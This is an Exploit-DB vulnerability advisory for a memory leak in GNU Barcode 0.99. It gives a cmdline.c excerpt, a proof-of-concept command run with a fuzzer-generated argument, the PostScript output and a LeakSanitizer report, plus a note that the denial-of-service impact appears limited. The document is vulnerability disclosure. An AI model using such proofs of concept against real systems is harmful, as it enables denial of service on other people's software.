GNU Barcode 0.99 – Memory Leak

  • 作者: LiquidWorm
    日期: 2018-05-29
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/44798/
  • # GNU Barcode 0.99 - Memory Leak
    # Vendor: The GNU Project | Free Software Foundation, Inc.
    # Product web page: https://www.gnu.org/software/barcode/
    # https://directory.fsf.org/wiki/Barcode
    # Affected version: 0.99
    # Tested on: Ubuntu 16.04.4
    # Author: Gjoko 'LiquidWorm' Krstic
    
    # Summary: GNU Barcode is a tool to convert text strings to printed bars.
    # It supports a variety of standard codes to represent the textual strings
    # and creates postscript output.
    
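    # Desc: GNU Barcode suffers from a memory leak vulnerability, which can be exploited
    # by malicious people to cause a DoS (Denial of Service). The vulnerability is
    # caused by an error in 'cmdline.c', which can be exploited to cause a
    # memory leak via a specially crafted file. The vulnerability is confirmed in
    # version 0.99. Other versions may also be affected.
    #
    # Note: the LeakSanitizer report below attributes the 512-byte leak to the
    # calloc(512, 1) for getopt_desc at cmdline.c:132, which is not freed before the
    # process exits. The 55-byte strdup() leak has no barcode frame in the trace, so
    # its call site is not identified here. Each is reported as a single object per
    # run, and in the run shown the -b argument is encoded as literal text (see the
    # 'Printing barcode for' line), so the leak does not appear to depend on the
    # input. The practical DoS impact therefore looks limited for a short-lived
    # command-line process; it would matter mainly where commandline() is called
    # repeatedly inside a long-lived process. The remedy is to free getopt_desc on
    # every return path of commandline() (the rest of the function is not shown here).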
    
    cmdline.c:
    
    128: int commandline(struct commandline *args, int argc, char **argv,
    129: char *errorhead)
    130: {
    131: struct commandline *ptr;
    132: char *getopt_desc = (char *)calloc(512, 1);
    133: int desc_offset = 0;
    134: int opt, retval;
    135: char *value;
    
    lqwrm@metalgear:~/research/barcode-0.99$ ./barcode -b id:000034,sig:06,src:000000,op:havoc,rep:128
    %!PS-Adobe-2.0
    %%Creator: "barcode", libbarcode sample frontend
    %%DocumentPaperSizes: A4
    %%EndComments
    %%EndProlog
    
    %%Page: 1 1
    
    % Printing barcode for "id:000034,sig:06,src:000000,op:havoc,rep:128", scaled 1.00, encoded using "code 128-B"
    % The space/bar succession is represented by the following widths (space first):
    % 02112141341111132221411221212411211241142121224111122141142121132221421121412213212211231221231221231221231222211322212311122321142121421121221143212211231222231121122321142121212411411223212211231221231221231221231221231221231221122321341111112423212211224111211244112121341111411221122321212411122141112423212211232212232113112221321132331112
    [
    % height xpos ypos width   height xpos ypos width
     [75.0011.0015.001.85][75.0013.5015.000.85]
     [75.0016.5015.000.85][70.0021.5020.000.85]
     [70.0027.0020.003.85][70.0030.5020.000.85]
     [70.0032.5020.000.85][70.0035.5020.002.85]
     [70.0040.0020.001.85][70.0043.5020.000.85]
     [70.0048.5020.000.85][70.0051.0020.001.85]
     [70.0054.5020.000.85][70.0057.5020.000.85]
     [70.0062.0020.003.85][70.0065.5020.000.85]
     [70.0068.5020.000.85][70.0071.0020.001.85]
     [70.0076.5020.000.85][70.0080.0020.003.85]
     [70.0084.5020.000.85][70.0087.5020.000.85]
     [70.0091.0020.001.85][70.0096.5020.000.85]
     [70.0098.5020.000.85][70.00 101.0020.001.85]
     [70.00 104.5020.000.85][70.00 109.5020.000.85]
     [70.00 113.0020.003.85][70.00 117.5020.000.85]
     [70.00 120.5020.000.85][70.00 123.5020.002.85]
     [70.00 128.0020.001.85][70.00 131.5020.000.85]
     [70.00 137.0020.001.85][70.00 139.5020.000.85]
     [70.00 142.5020.000.85][70.00 147.5020.000.85]
     [70.00 151.0020.001.85][70.00 154.5020.002.85]
     [70.00 158.5020.000.85][70.00 162.0020.001.85]
     [70.00 164.5020.000.85][70.00 168.5020.002.85]
     [70.00 172.0020.001.85][70.00 175.5020.000.85]
     [70.00 179.5020.002.85][70.00 183.0020.001.85]
     [70.00 186.5020.000.85][70.00 190.5020.002.85]
     [70.00 194.0020.001.85][70.00 197.5020.000.85]
     [70.00 201.5020.002.85][70.00 205.0020.001.85]
     [70.00 209.0020.001.85][70.00 212.5020.000.85]
     [70.00 215.5020.002.85][70.00 220.0020.001.85]
     [70.00 223.5020.000.85][70.00 227.5020.002.85]
     [70.00 230.5020.000.85][70.00 233.0020.001.85]
     [70.00 237.5020.002.85][70.00 241.5020.000.85]
     [70.00 245.0020.003.85][70.00 249.5020.000.85]
     [70.00 252.5020.000.85][70.00 258.0020.001.85]
     [70.00 260.5020.000.85][70.00 263.5020.000.85]
     [70.00 267.0020.001.85][70.00 269.5020.000.85]
     [70.00 275.5020.002.85][70.00 279.5020.000.85]
     [70.00 283.0020.001.85][70.00 285.5020.000.85]
     [70.00 289.5020.002.85][70.00 293.0020.001.85]
     [70.00 297.0020.001.85][70.00 301.5020.002.85]
     [70.00 304.5020.000.85][70.00 307.5020.000.85]
     [70.00 310.0020.001.85][70.00 314.5020.002.85]
     [70.00 318.5020.000.85][70.00 322.0020.003.85]
     [70.00 326.5020.000.85][70.00 329.5020.000.85]
     [70.00 332.5020.000.85][70.00 337.0020.003.85]
     [70.00 340.5020.000.85][70.00 345.5020.000.85]
     [70.00 348.0020.001.85][70.00 352.5020.002.85]
     [70.00 356.5020.000.85][70.00 360.0020.001.85]
     [70.00 362.5020.000.85][70.00 366.5020.002.85]
     [70.00 370.0020.001.85][70.00 373.5020.000.85]
     [70.00 377.5020.002.85][70.00 381.0020.001.85]
     [70.00 384.5020.000.85][70.00 388.5020.002.85]
     [70.00 392.0020.001.85][70.00 395.5020.000.85]
     [70.00 399.5020.002.85][70.00 403.0020.001.85]
     [70.00 406.5020.000.85][70.00 410.5020.002.85]
     [70.00 414.0020.001.85][70.00 417.5020.000.85]
     [70.00 421.5020.002.85][70.00 425.0020.001.85]
     [70.00 428.5020.000.85][70.00 431.0020.001.85]
     [70.00 435.5020.002.85][70.00 439.5020.000.85]
     [70.00 445.0020.003.85][70.00 448.5020.000.85]
     [70.00 450.5020.000.85][70.00 452.5020.000.85]
     [70.00 457.0020.003.85][70.00 462.5020.002.85]
     [70.00 466.5020.000.85][70.00 470.0020.001.85]
     [70.00 472.5020.000.85][70.00 476.0020.001.85]
     [70.00 481.5020.000.85][70.00 483.5020.000.85]
     [70.00 486.5020.000.85][70.00 489.0020.001.85]
     [70.00 496.0020.003.85][70.00 499.5020.000.85]
     [70.00 502.5020.000.85][70.00 505.5020.000.85]
     [70.00 511.0020.003.85][70.00 514.5020.000.85]
     [70.00 516.5020.000.85][70.00 521.5020.000.85]
     [70.00 524.0020.001.85][70.00 527.5020.000.85]
     [70.00 530.0020.001.85][70.00 534.5020.002.85]
     [70.00 538.5020.000.85][70.00 541.5020.000.85]
     [70.00 546.0020.003.85][70.00 549.5020.000.85]
     [70.00 552.0020.001.85][70.00 555.5020.000.85]
     [70.00 560.5020.000.85][70.00 562.5020.000.85]
     [70.00 567.0020.003.85][70.00 572.5020.002.85]
     [70.00 576.5020.000.85][70.00 580.0020.001.85]
     [70.00 582.5020.000.85][70.00 586.5020.002.85]
     [70.00 591.0020.001.85][70.00 594.0020.001.85]
     [70.00 598.5020.002.85][70.00 602.5020.000.85]
     [70.00 605.5020.002.85][70.00 608.5020.000.85]
     [70.00 612.0020.001.85][70.00 615.5020.000.85]
     [70.00 620.0020.001.85][70.00 622.5020.000.85]
     [75.00 627.0015.001.85][75.00 632.5015.002.85]
     [75.00 635.5015.000.85][75.00 638.0015.001.85]
    
    ] { {} forall setlinewidth moveto 0 exch rlineto stroke} bind forall
    [
    % char xpos ypos fontsize
    [(o) 21.0010.00 12.00]
    [(/) 32.0010.000.00]
    [(c) 43.0010.000.00]
    [(r) 54.0010.000.00]
    [(a) 65.0010.000.00]
    [(s) 76.0010.000.00]
    [(h) 87.0010.000.00]
    [(e) 98.0010.000.00]
    [(s)109.0010.000.00]
    [(/)120.0010.000.00]
    [(i)131.0010.000.00]
    [(d)142.0010.000.00]
    [(:)153.0010.000.00]
    [(0)164.0010.000.00]
    [(0)175.0010.000.00]
    [(0)186.0010.000.00]
    [(0)197.0010.000.00]
    [(3)208.0010.000.00]
    [(4)219.0010.000.00]
    [(,)230.0010.000.00]
    [(s)241.0010.000.00]
    [(i)252.0010.000.00]
    [(g)263.0010.000.00]
    [(:)274.0010.000.00]
    [(0)285.0010.000.00]
    [(6)296.0010.000.00]
    [(,)307.0010.000.00]
    [(s)318.0010.000.00]
    [(r)329.0010.000.00]
    [(c)340.0010.000.00]
    [(:)351.0010.000.00]
    [(0)362.0010.000.00]
    [(0)373.0010.000.00]
    [(0)384.0010.000.00]
    [(0)395.0010.000.00]
    [(0)406.0010.000.00]
    [(0)417.0010.000.00]
    [(,)428.0010.000.00]
    [(o)439.0010.000.00]
    [(p)450.0010.000.00]
    [(:)461.0010.000.00]
    [(h)472.0010.000.00]
    [(a)483.0010.000.00]
    [(v)494.0010.000.00]
    [(o)505.0010.000.00]
    [(c)516.0010.000.00]
    [(,)527.0010.000.00]
    [(r)538.0010.000.00]
    [(e)549.0010.000.00]
    [(p)560.0010.000.00]
    [(:)571.0010.000.00]
    [(1)582.0010.000.00]
    [(2)593.0010.000.00]
    [(8)604.0010.000.00]
    ] { {} forall dup 0.00 ne {
    /Helvetica findfont exch scalefont setfont
    } {pop} ifelse
    moveto show} bind forall
    % End barcode for "id:000034,sig:06,src:000000,op:havoc,rep:128"
    
    showpage
    %%Trailer
    
    ==2183==ERROR: LeakSanitizer: detected memory leaks
    
    Direct leak of 512 byte(s) in 1 object(s) allocated from:
    #0 0x7fcb3aca179a in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x9879a)
    #1 0x407be2 in commandline /home/lqwrm/research/barcode-0.99/cmdline.c:132
    
    Direct leak of 55 byte(s) in 1 object(s) allocated from:
    #0 0x7fcb3aca1602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
    #1 0x7fcb3a8ca489 in __strdup (/lib/x86_64-linux-gnu/libc.so.6+0x8b489)
    
    SUMMARY: AddressSanitizer: 567 byte(s) leaked in 2 allocation(s).